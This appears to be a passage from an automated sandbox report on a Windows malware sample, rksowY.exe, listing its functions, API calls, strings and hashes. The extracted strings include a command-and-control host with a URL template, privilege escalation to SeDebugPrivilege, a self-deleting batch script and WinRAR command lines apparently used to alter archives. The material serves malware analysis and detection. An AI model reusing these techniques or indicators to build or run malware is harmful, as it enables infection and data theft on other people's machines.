                                • Associated: 00000002.00000002.2237894642.00000000005B6000.00000040.00000001.01000000.00000005.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_2_2_5b0000_rksowY.jbxd
                                Similarity
                                • API ID: CreateCurrentDirectoryFileLookupModuleNameObjectPathPrivilegeProcessSingleSystemTempThreadValueVersionWaitlstrcpy
                                • String ID: C:\Users\user\AppData\Local\Temp\$C:\Users\user\AppData\Local\Temp\rksowY.exe$C:\Windows\system32$Documents and Settings
                                • API String ID: 123563730-4026290296
                                • Opcode ID: 78b3c6c8a41c75368a98ef686b3931eb51dece53f9e97506e75b8e01fd8b2c99
                                • Instruction ID: 8dfd5f350c6a86cb95f0dfa94b5979a1bac2a2143d7409dd4d3e0c022584e902
                                • Opcode Fuzzy Hash: 78b3c6c8a41c75368a98ef686b3931eb51dece53f9e97506e75b8e01fd8b2c99
                                • Instruction Fuzzy Hash: 0211D671541128BBCFA07BA49D4DEEB3F6DFF65361F500210F209A10A1DA707944EBA5
                                Function 005B1000 Relevance: 17.6, APIs: 7, Strings: 3, Instructions: 60fileCOMMON
                                Download Yara Rule

                                Control-flow Graph

                                • Executed
                                • Not Executed
                                control_flow_graph 205 5b1000-5b1023 CreateFileA 206 5b1092-5b1096 205->206 207 5b1025-5b1055 GetFileSize CreateFileMappingA MapViewOfFile 205->207 208 5b107b-5b1085 207->208 209 5b1057-5b105f 207->209 212 5b108d-5b1091 CloseHandle 208->212 213 5b1087-5b108b CloseHandle 208->213 210 5b1061-5b106e call 5b17d0 209->210 211 5b1074-5b1075 UnmapViewOfFile 209->211 210->211 211->208 212->206 213->212
                                APIs
                                • CreateFileA.KERNEL32(00000003,C0000000,00000003,00000000,00000003,00000080,00000000,HG[,http://%s:%d/%s/%s,005B10E8,?), ref: 005B1018
                                • GetFileSize.KERNEL32(00000000,00000000,ddos.dnsnb8.net,76938400), ref: 005B1029
                                • CreateFileMappingA.KERNEL32(00000000,00000000,00000004,00000000,00000000,00000000), ref: 005B1038
                                • MapViewOfFile.KERNEL32(00000000,000F001F,00000000,00000000,00000000), ref: 005B104B
                                • UnmapViewOfFile.KERNEL32(00000000), ref: 005B1075
                                • CloseHandle.KERNEL32(?), ref: 005B108B
                                • CloseHandle.KERNEL32(00000000), ref: 005B108E
                                Strings
                                Memory Dump Source
                                • Source File: 00000002.00000002.2235537464.00000000005B1000.00000020.00000001.01000000.00000005.sdmp, Offset: 005B0000, based on PE: true
                                • Associated: 00000002.00000002.2234467421.00000000005B0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                • Associated: 00000002.00000002.2236498849.00000000005B3000.00000002.00000001.01000000.00000005.sdmpDownload File
                                • Associated: 00000002.00000002.2237497442.00000000005B4000.00000004.00000001.01000000.00000005.sdmpDownload File
                                • Associated: 00000002.00000002.2237894642.00000000005B6000.00000040.00000001.01000000.00000005.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_2_2_5b0000_rksowY.jbxd
                                Similarity
                                • API ID: File$CloseCreateHandleView$MappingSizeUnmap
                                • String ID: HG[$ddos.dnsnb8.net$http://%s:%d/%s/%s
                                • API String ID: 1223616889-2694197261
                                • Opcode ID: 9fbcb6fab4356218cff39f5fdf6717c768eda59912f2e0dccba31a94ee4dcd2c
                                • Instruction ID: 8cb1f18f60ed676f9c53807b0c0b19aea1f5a6f7db929519b40e81465541a16b
                                • Opcode Fuzzy Hash: 9fbcb6fab4356218cff39f5fdf6717c768eda59912f2e0dccba31a94ee4dcd2c
                                • Instruction Fuzzy Hash: 150161B110465DBFE7707F609C8CE6BBBACEF44799F014629F245A2090DA707E489B64
                                Function 005B2C48 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 50threadCOMMON
                                Download Yara Rule

                                Control-flow Graph

                                • Executed
                                • Not Executed
                                control_flow_graph 377 5b2c48-5b2c75 memset call 5b1973 380 5b2cb2-5b2cb9 377->380 381 5b2c77-5b2c7f 377->381 384 5b2cbb-5b2cc2 VirtualFree 380->384 385 5b2cc8-5b2ccc 380->385 382 5b2c8f-5b2cac CreateThread WaitForMultipleObjects 381->382 383 5b2c81-5b2c8b 381->383 382->380 383->382 384->385
                                APIs
                                • memset.MSVCRT ref: 005B2C57
                                  • Part of subcall function 005B1973: PathFileExistsA.SHLWAPI(\N[`N[,00000000,C:\Users\user\AppData\Local\Temp\rksowY.exe), ref: 005B1992
                                  • Part of subcall function 005B1973: CreateFileA.KERNEL32(?,80000000,00000001,00000000,00000003,00000000,00000000,00000000), ref: 005B19BA
                                  • Part of subcall function 005B1973: Sleep.KERNEL32(00000064), ref: 005B19C6
                                  • Part of subcall function 005B1973: wsprintfA.USER32 ref: 005B19EC
                                  • Part of subcall function 005B1973: CopyFileA.KERNEL32(?,?,00000000), ref: 005B1A00
                                  • Part of subcall function 005B1973: CreateFileA.KERNEL32(?,80000000,00000001,00000000,00000003,00000000,00000000), ref: 005B1A1E
                                  • Part of subcall function 005B1973: GetFileSize.KERNEL32(?,00000000), ref: 005B1A2C
                                  • Part of subcall function 005B1973: VirtualAlloc.KERNEL32(00000000,00000000,00003000,00000004), ref: 005B1A46
                                  • Part of subcall function 005B1973: ReadFile.KERNEL32(?,?,00000000,?,00000000), ref: 005B1A65
                                • CreateThread.KERNEL32(00000000,00000000,005B2B8C,00000000,00000000,00000000), ref: 005B2C99
                                • WaitForMultipleObjects.KERNEL32(00000001,005B16BA,00000001,000000FF,?,005B16BA,00000000), ref: 005B2CAC
                                • VirtualFree.KERNEL32(007E0000,00000000,00008000,C:\Users\user\AppData\Local\Temp\rksowY.exe,005B4E5C,005B4E60,?,005B16BA,00000000), ref: 005B2CC2
                                Strings
                                • C:\Users\user\AppData\Local\Temp\rksowY.exe, xrefs: 005B2C69
                                Memory Dump Source
                                • Source File: 00000002.00000002.2235537464.00000000005B1000.00000020.00000001.01000000.00000005.sdmp, Offset: 005B0000, based on PE: true
                                • Associated: 00000002.00000002.2234467421.00000000005B0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                • Associated: 00000002.00000002.2236498849.00000000005B3000.00000002.00000001.01000000.00000005.sdmpDownload File
                                • Associated: 00000002.00000002.2237497442.00000000005B4000.00000004.00000001.01000000.00000005.sdmpDownload File
                                • Associated: 00000002.00000002.2237894642.00000000005B6000.00000040.00000001.01000000.00000005.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_2_2_5b0000_rksowY.jbxd
                                Similarity
                                • API ID: File$Create$Virtual$AllocCopyExistsFreeMultipleObjectsPathReadSizeSleepThreadWaitmemsetwsprintf
                                • String ID: C:\Users\user\AppData\Local\Temp\rksowY.exe
                                • API String ID: 2042498389-3988848653
                                • Opcode ID: 89ea27de0a0c852263894f4ad7c98e9b756fe54046603c91555abc2f3ffeb2e6
                                • Instruction ID: 33119c6d39f853b6e4751d43ea2199b1a68835162fb463b6f4639cfc7b0e74e0
                                • Opcode Fuzzy Hash: 89ea27de0a0c852263894f4ad7c98e9b756fe54046603c91555abc2f3ffeb2e6
                                • Instruction Fuzzy Hash: E7017C716412287AD760ABA59C1EEEB7E6CFF51B60F104220F905E61C2D6A0FA04CBB5
                                Function 005B14E1 Relevance: 4.6, APIs: 3, Instructions: 55COMMON
                                Download Yara Rule

                                Control-flow Graph

                                • Executed
                                • Not Executed
                                control_flow_graph 386 5b14e1-5b14fb 387 5b14fd-5b1510 GetModuleHandleA 386->387 388 5b1541-5b1547 386->388 389 5b151a-5b1535 VirtualQuery 387->389 390 5b1512-5b1518 387->390 391 5b1549-5b154c 388->391 392 5b1573-5b1574 call 5b1638 388->392 394 5b153b 389->394 395 5b1537-5b1539 389->395 390->388 396 5b1569-5b1570 391->396 397 5b154e-5b1555 391->397 398 5b1579-5b157a ExitProcess 392->398 394->388 395->388 395->394 397->396 399 5b1557-5b1566 call 5b1af9 397->399 399->396
                                APIs
                                • GetModuleHandleA.KERNEL32(00000000), ref: 005B1504
                                • VirtualQuery.KERNEL32(005B14E1,?,0000001C), ref: 005B1525
                                • ExitProcess.KERNEL32 ref: 005B157A
                                Memory Dump Source
                                • Source File: 00000002.00000002.2235537464.00000000005B1000.00000020.00000001.01000000.00000005.sdmp, Offset: 005B0000, based on PE: true
                                • Associated: 00000002.00000002.2234467421.00000000005B0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                • Associated: 00000002.00000002.2236498849.00000000005B3000.00000002.00000001.01000000.00000005.sdmpDownload File
                                • Associated: 00000002.00000002.2237497442.00000000005B4000.00000004.00000001.01000000.00000005.sdmpDownload File
                                • Associated: 00000002.00000002.2237894642.00000000005B6000.00000040.00000001.01000000.00000005.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_2_2_5b0000_rksowY.jbxd
                                Similarity
                                • API ID: ExitHandleModuleProcessQueryVirtual
                                • String ID:
                                • API String ID: 3946701194-0
                                • Opcode ID: e994c4651e211e5f1bfc7f2121094fe97fa37d13a13a2a8a462b3e48d200e0cf
                                • Instruction ID: a0ffdb11c214278ec0653a1cab2434dd706430bc2e8f66886b61f24be45519a4
                                • Opcode Fuzzy Hash: e994c4651e211e5f1bfc7f2121094fe97fa37d13a13a2a8a462b3e48d200e0cf
                                • Instruction Fuzzy Hash: 4D118271A00614DFCBB0DFA5A8A9ABD7FBCFBA4710B50422AF402D3191D230B945EF54
                                Function 005B1915 Relevance: 4.5, APIs: 3, Instructions: 41timeCOMMON
                                Download Yara Rule

                                Control-flow Graph

                                • Executed
                                • Not Executed
                                control_flow_graph 402 5b1915-5b1922 403 5b1928-5b192c 402->403 404 5b1924-5b1926 402->404 406 5b194f-5b1952 403->406 407 5b192e-5b194d memset GetFileTime 403->407 405 5b196e-5b1970 404->405 406->405 409 5b1954-5b1960 SetFileTime 406->409 408 5b1966-5b1968 407->408 410 5b196a 408->410 411 5b196c 408->411 409->408 410->411 411->405
                                APIs
                                Memory Dump Source
                                • Source File: 00000002.00000002.2235537464.00000000005B1000.00000020.00000001.01000000.00000005.sdmp, Offset: 005B0000, based on PE: true
                                • Associated: 00000002.00000002.2234467421.00000000005B0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                • Associated: 00000002.00000002.2236498849.00000000005B3000.00000002.00000001.01000000.00000005.sdmpDownload File
                                • Associated: 00000002.00000002.2237497442.00000000005B4000.00000004.00000001.01000000.00000005.sdmpDownload File
                                • Associated: 00000002.00000002.2237894642.00000000005B6000.00000040.00000001.01000000.00000005.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_2_2_5b0000_rksowY.jbxd
                                Similarity
                                • API ID: FileTimememset
                                • String ID:
                                • API String ID: 176422537-0
                                • Opcode ID: 210d551cabfc76cf8ca6da0b9051b620265a0397a2c5116bfb374c81d2e148c8
                                • Instruction ID: 91d70e7703b465b37710f7726abcebeb495cf14c8b141b805fa6de6b348716f0
                                • Opcode Fuzzy Hash: 210d551cabfc76cf8ca6da0b9051b620265a0397a2c5116bfb374c81d2e148c8
                                • Instruction Fuzzy Hash: BBF04432200649ABD7609E26DC14BE77FACBF50361F508536F516D5060E730F6499BB4

                                Non-executed Functions

                                Function 005B119F Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 40COMMON
                                Download Yara Rule
                                APIs
                                • GetCurrentProcess.KERNEL32(C:\Users\user\AppData\Local\Temp\rksowY.exe,?,?,?,?,?,?,005B13EF), ref: 005B11AB
                                • OpenProcessToken.ADVAPI32(00000000,00000028,005B13EF,?,?,?,?,?,?,005B13EF), ref: 005B11BB
                                • AdjustTokenPrivileges.ADVAPI32(005B13EF,00000000,?,00000010,00000000,00000000), ref: 005B11EB
                                • CloseHandle.KERNEL32(005B13EF), ref: 005B11FA
                                • CloseHandle.KERNEL32(?,?,?,?,?,?,?,005B13EF), ref: 005B1203
                                Strings
                                • C:\Users\user\AppData\Local\Temp\rksowY.exe, xrefs: 005B11A5
                                Memory Dump Source
                                • Source File: 00000002.00000002.2235537464.00000000005B1000.00000020.00000001.01000000.00000005.sdmp, Offset: 005B0000, based on PE: true
                                • Associated: 00000002.00000002.2234467421.00000000005B0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                • Associated: 00000002.00000002.2236498849.00000000005B3000.00000002.00000001.01000000.00000005.sdmpDownload File
                                • Associated: 00000002.00000002.2237497442.00000000005B4000.00000004.00000001.01000000.00000005.sdmpDownload File
                                • Associated: 00000002.00000002.2237894642.00000000005B6000.00000040.00000001.01000000.00000005.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_2_2_5b0000_rksowY.jbxd
                                Similarity
                                • API ID: CloseHandleProcessToken$AdjustCurrentOpenPrivileges
                                • String ID: C:\Users\user\AppData\Local\Temp\rksowY.exe
                                • API String ID: 75692138-3988848653
                                • Opcode ID: d25beccb80f1b177ed0137518ab0bc8e3ee9e69a50d21b320cf650188824fa12
                                • Instruction ID: 0b27e268e3acda2cccd53c2ebb6d2833099eb865e39b992bc4d1bafb041fc1dd
                                • Opcode Fuzzy Hash: d25beccb80f1b177ed0137518ab0bc8e3ee9e69a50d21b320cf650188824fa12
                                • Instruction Fuzzy Hash: BE01E87590020DEFDB40EFE4CD89AAEBFB8FF14305F504569E606A2150D7716F48AB50
                                Function 005B139F Relevance: 8.9, APIs: 3, Strings: 2, Instructions: 109COMMON
                                Download Yara Rule
                                APIs
                                • GetVersionExA.KERNEL32(?,?,00000104,C:\Users\user\AppData\Local\Temp\rksowY.exe), ref: 005B13BC
                                • LookupPrivilegeValueA.ADVAPI32(00000000,SeDebugPrivilege,?), ref: 005B13DA
                                • GetCurrentProcessId.KERNEL32(-00000094,0000000C,0000000C,00000001), ref: 005B1448
                                  • Part of subcall function 005B119F: GetCurrentProcess.KERNEL32(C:\Users\user\AppData\Local\Temp\rksowY.exe,?,?,?,?,?,?,005B13EF), ref: 005B11AB
                                  • Part of subcall function 005B119F: OpenProcessToken.ADVAPI32(00000000,00000028,005B13EF,?,?,?,?,?,?,005B13EF), ref: 005B11BB
                                  • Part of subcall function 005B119F: AdjustTokenPrivileges.ADVAPI32(005B13EF,00000000,?,00000010,00000000,00000000), ref: 005B11EB
                                  • Part of subcall function 005B119F: CloseHandle.KERNEL32(005B13EF), ref: 005B11FA
                                  • Part of subcall function 005B119F: CloseHandle.KERNEL32(?,?,?,?,?,?,?,005B13EF), ref: 005B1203
                                Strings
                                • SeDebugPrivilege, xrefs: 005B13D3
                                • C:\Users\user\AppData\Local\Temp\rksowY.exe, xrefs: 005B13A8
                                Memory Dump Source
                                • Source File: 00000002.00000002.2235537464.00000000005B1000.00000020.00000001.01000000.00000005.sdmp, Offset: 005B0000, based on PE: true
                                • Associated: 00000002.00000002.2234467421.00000000005B0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                • Associated: 00000002.00000002.2236498849.00000000005B3000.00000002.00000001.01000000.00000005.sdmpDownload File
                                • Associated: 00000002.00000002.2237497442.00000000005B4000.00000004.00000001.01000000.00000005.sdmpDownload File
                                • Associated: 00000002.00000002.2237894642.00000000005B6000.00000040.00000001.01000000.00000005.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_2_2_5b0000_rksowY.jbxd
                                Similarity
                                • API ID: Process$CloseCurrentHandleToken$AdjustLookupOpenPrivilegePrivilegesValueVersion
                                • String ID: C:\Users\user\AppData\Local\Temp\rksowY.exe$SeDebugPrivilege
                                • API String ID: 4123949106-1127714520
                                • Opcode ID: a8190d04480be2bbc8ca1f1a4017150c07ef449270f839ab6bbaa8227013d8ef
                                • Instruction ID: 5fb0b3b76f4f0f516ae12f878b311048a8a95dce840d30f76cd016997cdb51ed
                                • Opcode Fuzzy Hash: a8190d04480be2bbc8ca1f1a4017150c07ef449270f839ab6bbaa8227013d8ef
                                • Instruction Fuzzy Hash: 55318471D0060AEADFA09BA58C5AFDEBFB8FB84704F604569E504B2151E6307E45CB64
                                Function 005B239D Relevance: 56.2, APIs: 26, Strings: 6, Instructions: 239sleepfilestringCOMMON
                                Download Yara Rule

                                Control-flow Graph

                                • Executed
                                • Not Executed
                                control_flow_graph 415 5b239d-5b23d6 strstr 416 5b23d8-5b23e2 415->416 417 5b2451-5b247a CreateFileA GetFileSize 415->417 420 5b23ed-5b23f1 416->420 418 5b2480-5b2483 417->418 419 5b2675-5b2676 CloseHandle 417->419 418->419 421 5b2489-5b2493 418->421 422 5b267c-5b2681 RemoveDirectoryA 419->422 423 5b23f3-5b241d 420->423 424 5b23e4-5b23ec 420->424 421->419 425 5b2499-5b254b call 5b1915 CloseHandle memset strrchr wsprintfA strrchr memset * 2 wsprintfA Sleep call 5b189d 421->425 426 5b2687-5b268f 422->426 423->417 427 5b241f-5b2425 423->427 424->420 425->422 436 5b2551-5b2556 425->436 428 5b243a-5b2443 427->428 429 5b2427-5b2436 427->429 428->426 432 5b2449 428->432 429->427 431 5b2438 429->431 431->417 432->417 436->422 437 5b255c-5b261c Sleep memset wsprintfA call 5b29e2 memset wsprintfA Sleep call 5b189d Sleep CreateFileA call 5b1915 CloseHandle 436->437 437->422 444 5b261e-5b2626 437->444 444->422 445 5b2628-5b262c 444->445 446 5b262e-5b2632 445->446 447 5b2634-5b2640 445->447 448 5b2641-5b2665 SetFilePointer WriteFile 446->448 447->448 448->422 449 5b2667-5b2673 SetEndOfFile 448->449 449->422
                                APIs
                                • strstr.MSVCRT ref: 005B23CC
                                • CreateFileA.KERNEL32(?,C0000000,00000003,00000000,00000003,00000080,00000000), ref: 005B2464
                                • GetFileSize.KERNEL32(00000000,00000000), ref: 005B2472
                                • CloseHandle.KERNEL32(?,00000000,00000000), ref: 005B24A8
                                • memset.MSVCRT ref: 005B24B9
                                • strrchr.MSVCRT ref: 005B24C9
                                • wsprintfA.USER32 ref: 005B24DE
                                • strrchr.MSVCRT ref: 005B24ED
                                • memset.MSVCRT ref: 005B24F2
                                • memset.MSVCRT ref: 005B2505
                                • wsprintfA.USER32 ref: 005B2524
                                • Sleep.KERNEL32(000007D0), ref: 005B2535
                                • Sleep.KERNEL32(000007D0), ref: 005B255D
                                • memset.MSVCRT ref: 005B256E
                                • wsprintfA.USER32 ref: 005B2585
                                • memset.MSVCRT ref: 005B25A6
                                • wsprintfA.USER32 ref: 005B25CA
                                • Sleep.KERNEL32(000007D0), ref: 005B25D0
                                • Sleep.KERNEL32(000007D0,?,?), ref: 005B25E5
                                • CreateFileA.KERNEL32(?,C0000000,00000003,00000000,00000003,00000080,00000000), ref: 005B25FC
                                • CloseHandle.KERNEL32(00000000,00000000,00000001), ref: 005B2611
                                • SetFilePointer.KERNEL32(FFFFFFFF,?,00000000,00000000), ref: 005B2642
                                • WriteFile.KERNEL32(?,00000006,?,00000000), ref: 005B265B
                                • SetEndOfFile.KERNEL32 ref: 005B266D
                                • CloseHandle.KERNEL32(00000000), ref: 005B2676
                                • RemoveDirectoryA.KERNEL32(?), ref: 005B2681
                                Strings
                                Memory Dump Source
                                • Source File: 00000002.00000002.2235537464.00000000005B1000.00000020.00000001.01000000.00000005.sdmp, Offset: 005B0000, based on PE: true
                                • Associated: 00000002.00000002.2234467421.00000000005B0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                • Associated: 00000002.00000002.2236498849.00000000005B3000.00000002.00000001.01000000.00000005.sdmpDownload File
                                • Associated: 00000002.00000002.2237497442.00000000005B4000.00000004.00000001.01000000.00000005.sdmpDownload File
                                • Associated: 00000002.00000002.2237894642.00000000005B6000.00000040.00000001.01000000.00000005.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_2_2_5b0000_rksowY.jbxd
                                Similarity
                                • API ID: File$memset$Sleepwsprintf$CloseHandle$Createstrrchr$DirectoryPointerRemoveSizeWritestrstr
                                • String ID: %s M %s -r -o+ -ep1 "%s" "%s\*"$%s X -ibck "%s" "%s\"$%s%s$%s\$-ibck$C:\Users\user\AppData\Local\Temp\
                                • API String ID: 2203340711-774930870
                                • Opcode ID: f0f97b2ea37edc853cced8b6eb9ead662c1cea201e820d5b0d63d872e303ccbd
                                • Instruction ID: aafc80591321180205b1ca31778ee8960a370ea434cf51efc079866a511c8654
                                • Opcode Fuzzy Hash: f0f97b2ea37edc853cced8b6eb9ead662c1cea201e820d5b0d63d872e303ccbd
                                • Instruction Fuzzy Hash: BA819271504349BBD710AF60DC49EABBBECFF98704F000A19FA44E21A0D774FA499B66
                                Function 005B274A Relevance: 28.1, APIs: 9, Strings: 7, Instructions: 83fileCOMMON
                                Download Yara Rule
                                APIs
                                • memset.MSVCRT ref: 005B2766
                                • memset.MSVCRT ref: 005B2774
                                • SHGetSpecialFolderPathA.SHELL32(00000000,?,00000026,00000000), ref: 005B2787
                                • wsprintfA.USER32 ref: 005B27AB
                                  • Part of subcall function 005B185B: GetSystemTimeAsFileTime.KERNEL32(?,ddos.dnsnb8.net,76938400,http://%s:%d/%s/%s,?,?,?,005B1118), ref: 005B1867
                                  • Part of subcall function 005B185B: srand.MSVCRT ref: 005B1878
                                  • Part of subcall function 005B185B: rand.MSVCRT ref: 005B1880
                                  • Part of subcall function 005B185B: srand.MSVCRT ref: 005B1890
                                  • Part of subcall function 005B185B: rand.MSVCRT ref: 005B1894
                                • wsprintfA.USER32 ref: 005B27C6
                                • CopyFileA.KERNEL32(?,005B4C80,00000000), ref: 005B27D4
                                • wsprintfA.USER32 ref: 005B27F4
                                  • Part of subcall function 005B1973: PathFileExistsA.SHLWAPI(\N[`N[,00000000,C:\Users\user\AppData\Local\Temp\rksowY.exe), ref: 005B1992
                                  • Part of subcall function 005B1973: CreateFileA.KERNEL32(?,80000000,00000001,00000000,00000003,00000000,00000000,00000000), ref: 005B19BA
                                  • Part of subcall function 005B1973: Sleep.KERNEL32(00000064), ref: 005B19C6
                                  • Part of subcall function 005B1973: wsprintfA.USER32 ref: 005B19EC
                                  • Part of subcall function 005B1973: CopyFileA.KERNEL32(?,?,00000000), ref: 005B1A00
                                  • Part of subcall function 005B1973: CreateFileA.KERNEL32(?,80000000,00000001,00000000,00000003,00000000,00000000), ref: 005B1A1E
                                  • Part of subcall function 005B1973: GetFileSize.KERNEL32(?,00000000), ref: 005B1A2C
                                  • Part of subcall function 005B1973: VirtualAlloc.KERNEL32(00000000,00000000,00003000,00000004), ref: 005B1A46
                                  • Part of subcall function 005B1973: ReadFile.KERNEL32(?,?,00000000,?,00000000), ref: 005B1A65
                                • DeleteFileA.KERNEL32(?,?,005B4E54,005B4E58), ref: 005B281A
                                • CreateFileA.KERNEL32(?,C0000000,00000000,00000000,00000004,00000000,00000000,?,005B4E54,005B4E58), ref: 005B2832
                                Strings
                                Memory Dump Source
                                • Source File: 00000002.00000002.2235537464.00000000005B1000.00000020.00000001.01000000.00000005.sdmp, Offset: 005B0000, based on PE: true
                                • Associated: 00000002.00000002.2234467421.00000000005B0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                • Associated: 00000002.00000002.2236498849.00000000005B3000.00000002.00000001.01000000.00000005.sdmpDownload File
                                • Associated: 00000002.00000002.2237497442.00000000005B4000.00000004.00000001.01000000.00000005.sdmpDownload File
                                • Associated: 00000002.00000002.2237894642.00000000005B6000.00000040.00000001.01000000.00000005.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_2_2_5b0000_rksowY.jbxd
                                Similarity
                                • API ID: File$wsprintf$Create$CopyPathTimememsetrandsrand$AllocDeleteExistsFolderReadSizeSleepSpecialSystemVirtual
                                • String ID: %s%.8x.exe$%s%s$%s\%s$C:\Users\user\AppData\Local\Temp\$C:\Windows\system32$\WinRAR\Rar.exe$c_31892.nls
                                • API String ID: 692489704-3099098879
                                • Opcode ID: b445bdc29e53159cd6356a59725b8f0d931d80c4251a65463ae8f1707631922b
                                • Instruction ID: 6e2c816c697390199963b8194aee79fc56c7995852f43f64a2cfc02157959159
                                • Opcode Fuzzy Hash: b445bdc29e53159cd6356a59725b8f0d931d80c4251a65463ae8f1707631922b
                                • Instruction Fuzzy Hash: F32130B694021C7BDB50E7A49C8AEEB7B6CFB14744F4005A1B644F2052E670FF488AB0
                                Function 005B1581 Relevance: 21.1, APIs: 7, Strings: 5, Instructions: 67filestringCOMMON
                                Download Yara Rule
                                APIs
                                  • Part of subcall function 005B185B: GetSystemTimeAsFileTime.KERNEL32(?,ddos.dnsnb8.net,76938400,http://%s:%d/%s/%s,?,?,?,005B1118), ref: 005B1867
                                  • Part of subcall function 005B185B: srand.MSVCRT ref: 005B1878
                                  • Part of subcall function 005B185B: rand.MSVCRT ref: 005B1880
                                  • Part of subcall function 005B185B: srand.MSVCRT ref: 005B1890
                                  • Part of subcall function 005B185B: rand.MSVCRT ref: 005B1894
                                • wsprintfA.USER32 ref: 005B15AA
                                • wsprintfA.USER32 ref: 005B15C6
                                • lstrlen.KERNEL32(?), ref: 005B15D2
                                • CreateFileA.KERNEL32(?,C0000000,00000000,00000000,00000002,00000000,00000000), ref: 005B15EE
                                • WriteFile.KERNEL32(00000000,?,00000000,00000001,00000000), ref: 005B1609
                                • CloseHandle.KERNEL32(00000000), ref: 005B1612
                                • ShellExecuteA.SHELL32(00000000,open,?,00000000,00000000,00000000), ref: 005B162D
                                Strings
                                Memory Dump Source
                                • Source File: 00000002.00000002.2235537464.00000000005B1000.00000020.00000001.01000000.00000005.sdmp, Offset: 005B0000, based on PE: true
                                • Associated: 00000002.00000002.2234467421.00000000005B0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                • Associated: 00000002.00000002.2236498849.00000000005B3000.00000002.00000001.01000000.00000005.sdmpDownload File
                                • Associated: 00000002.00000002.2237497442.00000000005B4000.00000004.00000001.01000000.00000005.sdmpDownload File
                                • Associated: 00000002.00000002.2237894642.00000000005B6000.00000040.00000001.01000000.00000005.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_2_2_5b0000_rksowY.jbxd
                                Similarity
                                • API ID: File$Timerandsrandwsprintf$CloseCreateExecuteHandleShellSystemWritelstrlen
                                • String ID: %s%.8x.bat$:DELFILEdel "%s"if exist "%s" goto :DELFILEdel "%s"$C:\Users\user\AppData\Local\Temp\$C:\Users\user\AppData\Local\Temp\rksowY.exe$open
                                • API String ID: 617340118-3950612495
                                • Opcode ID: 84fcda3b98335c0778cd3316626e266a1bdd8e1a7fb987c080a5b765adc99126
                                • Instruction ID: a3b6c19e9721768ea97542abf261e1a2ac4f2af3702608ba59dd3bd7bce79e69
                                • Opcode Fuzzy Hash: 84fcda3b98335c0778cd3316626e266a1bdd8e1a7fb987c080a5b765adc99126
                                • Instruction Fuzzy Hash: 05115172A01128BAD76097A89C8DDEB7F6CEF59750F000151F549F2041EA70BB88CBB0
                                Function 005B120E Relevance: 19.3, APIs: 8, Strings: 3, Instructions: 93librarymemoryloaderCOMMON
                                Download Yara Rule
                                APIs
                                • GetModuleHandleA.KERNEL32(ntdll.dll,ZwQuerySystemInformation,00000104,?,?,?,?,005B1400), ref: 005B1226
                                • GetProcAddress.KERNEL32(00000000), ref: 005B122D
                                • GetCurrentProcessId.KERNEL32(?,?,?,?,005B1400), ref: 005B123F
                                • OpenProcess.KERNEL32(00000400,00000000,00000000,?,?,?,?,005B1400), ref: 005B1250
                                • VirtualFree.KERNEL32(00000000,00000000,00008000,?,C:\Users\user\AppData\Local\Temp\rksowY.exe,?,?,?,?,005B1400), ref: 005B129E
                                • VirtualAlloc.KERNEL32(00000000,00050000,00003000,00000004,00000001,?,C:\Users\user\AppData\Local\Temp\rksowY.exe,?,?,?,?,005B1400), ref: 005B12B0
                                • CloseHandle.KERNEL32(?,?,C:\Users\user\AppData\Local\Temp\rksowY.exe,?,?,?,?,005B1400), ref: 005B12F5
                                • VirtualFree.KERNEL32(00000000,00000000,00008000,?,?,?,005B1400), ref: 005B130A
                                Strings
                                • ntdll.dll, xrefs: 005B1219
                                • C:\Users\user\AppData\Local\Temp\rksowY.exe, xrefs: 005B1262
                                • ZwQuerySystemInformation, xrefs: 005B1212
                                Memory Dump Source
                                • Source File: 00000002.00000002.2235537464.00000000005B1000.00000020.00000001.01000000.00000005.sdmp, Offset: 005B0000, based on PE: true
                                • Associated: 00000002.00000002.2234467421.00000000005B0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                • Associated: 00000002.00000002.2236498849.00000000005B3000.00000002.00000001.01000000.00000005.sdmpDownload File
                                • Associated: 00000002.00000002.2237497442.00000000005B4000.00000004.00000001.01000000.00000005.sdmpDownload File
                                • Associated: 00000002.00000002.2237894642.00000000005B6000.00000040.00000001.01000000.00000005.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_2_2_5b0000_rksowY.jbxd
                                Similarity
                                • API ID: Virtual$FreeHandleProcess$AddressAllocCloseCurrentModuleOpenProc
                                • String ID: C:\Users\user\AppData\Local\Temp\rksowY.exe$ZwQuerySystemInformation$ntdll.dll
                                • API String ID: 1500695312-2272525774
                                • Opcode ID: a96d19de5db2825e751908b765780932a916f589ca99a3116f36f9c071267f81
                                • Instruction ID: 963d7b1bb248f12c345b446f81d3038bcdf2d5b44579a248c5495c2e02c0ced2
                                • Opcode Fuzzy Hash: a96d19de5db2825e751908b765780932a916f589ca99a3116f36f9c071267f81
                                • Instruction Fuzzy Hash: 9B21F731605B11EBD760AF56CC18BABBFA8FF45B00F900A28F545E6240D770F944C7A9
                                Function 005B189D Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 51processsynchronizationCOMMON
                                Download Yara Rule
                                APIs
                                • memset.MSVCRT ref: 005B18B1
                                • CreateProcessA.KERNEL32(00000000,?,00000000,00000000,00000001,0C000000,00000000,00000000,?,?,000007D0,76230F00,76938400), ref: 005B18D3
